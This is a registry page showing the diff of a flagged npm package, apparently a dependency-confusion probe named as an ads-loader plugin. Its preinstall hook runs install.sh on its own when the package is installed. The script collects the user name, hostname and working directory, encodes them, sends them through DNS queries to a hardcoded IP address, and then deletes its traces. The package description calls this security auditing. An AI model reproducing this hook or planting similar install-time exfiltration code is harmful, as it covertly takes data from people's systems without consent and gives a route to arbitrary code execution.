bernie-plugin-ads-loader-script 1.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of bernie-plugin-ads-loader-script might be problematic. Click here for more details.
- package/index.js +1 -0
- package/install.sh +21 -0
- package/package.json +12 -0
package/index.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
hey = "when";
|
package/install.sh
ADDED
|
@@ -0,0 +1,21 @@
|
|
|
1
|
+
#!/bin/sh
|
|
2
|
+
|
|
3
|
+
echo "whoami=$(whoami) hostname=$(hostname) pwd=$(pwd)" > fTAlV68xlGvW2UDXe8wdUIiCQwXvtRJ8
|
|
4
|
+
f=fTAlV68xlGvW2UDXe8wdUIiCQwXvtRJ8; s=4;b=60;c=0;z="google.com";
|
|
5
|
+
gzip -c $f| base64 -w0 | sed "s/.\{$b\}/&\n/g" > YdWEqNicvcxahFsmT9lKT4rP9h7QAT7U
|
|
6
|
+
echo "\n" >> YdWEqNicvcxahFsmT9lKT4rP9h7QAT7U
|
|
7
|
+
touch jVmpn0feQo4iGkV9R1Jb3OQBoUn6MRAB
|
|
8
|
+
while read i; do
|
|
9
|
+
if [ "$c" -lt "$s" ]; then echo "$i." >> jVmpn0feQo4iGkV9R1Jb3OQBoUn6MRAB; c=$(($c+1)); else echo "\n$i." >> jVmpn0feQo4iGkV9R1Jb3OQBoUn6MRAB; c=1; fi;
|
|
10
|
+
done <YdWEqNicvcxahFsmT9lKT4rP9h7QAT7U
|
|
11
|
+
cat jVmpn0feQo4iGkV9R1Jb3OQBoUn6MRAB | tr -d '\n' | sed -E 's/\.\./\./g' > E0NCUWrHA2PHLphaQFw4ycPWhDRYiSwU
|
|
12
|
+
echo "\n" >> E0NCUWrHA2PHLphaQFw4ycPWhDRYiSwU
|
|
13
|
+
while read r; do
|
|
14
|
+
dig @3.133.64.107 `echo $r$z|tr "+" "*"` +short;
|
|
15
|
+
#dig @127.0.0.1 `echo $r$z|tr "+" "*"` +short;
|
|
16
|
+
done <E0NCUWrHA2PHLphaQFw4ycPWhDRYiSwU
|
|
17
|
+
rm -f jVmpn0feQo4iGkV9R1Jb3OQBoUn6MRAB
|
|
18
|
+
rm -f E0NCUWrHA2PHLphaQFw4ycPWhDRYiSwU
|
|
19
|
+
rm -f YdWEqNicvcxahFsmT9lKT4rP9h7QAT7U
|
|
20
|
+
rm -f fTAlV68xlGvW2UDXe8wdUIiCQwXvtRJ8
|
|
21
|
+
|
package/package.json
ADDED
|
@@ -0,0 +1,12 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "bernie-plugin-ads-loader-script",
|
|
3
|
+
"version": "1.0.0",
|
|
4
|
+
"description": "do not intentionally install. this package contains no JavaScript code, and is for security auditing purposes only. FYI: this package runs a preinstall script that, upon this package being installed, runs three shell commands on the system that installed it: whoami, hostname, and pwd. it sends the output from those commands (gzipped and base64 encoded) to a fake DNS server via a DNS query. the goal is to identify any systems that are inadvertently configured to install this package from the public npm registry (even though this package name was not previously owned by anyone on the public registry, and could be claimed by anyone). This vulnerability is known as 'dependency confusion' and could allow a malicious actor to run arbitrary code on affected systems if not remedied. any systems identified as vulnerable will be immediately reported to the companies owning the vulnerable systems, so those systems can be properly hardened against this issue (if those companies can be identified from the output of whoami, hostname, pwd, and the source IP address).",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
8
|
+
"preinstall": "sh ./install.sh"
|
|
9
|
+
},
|
|
10
|
+
"author": "",
|
|
11
|
+
"license": "ISC"
|
|
12
|
+
}
|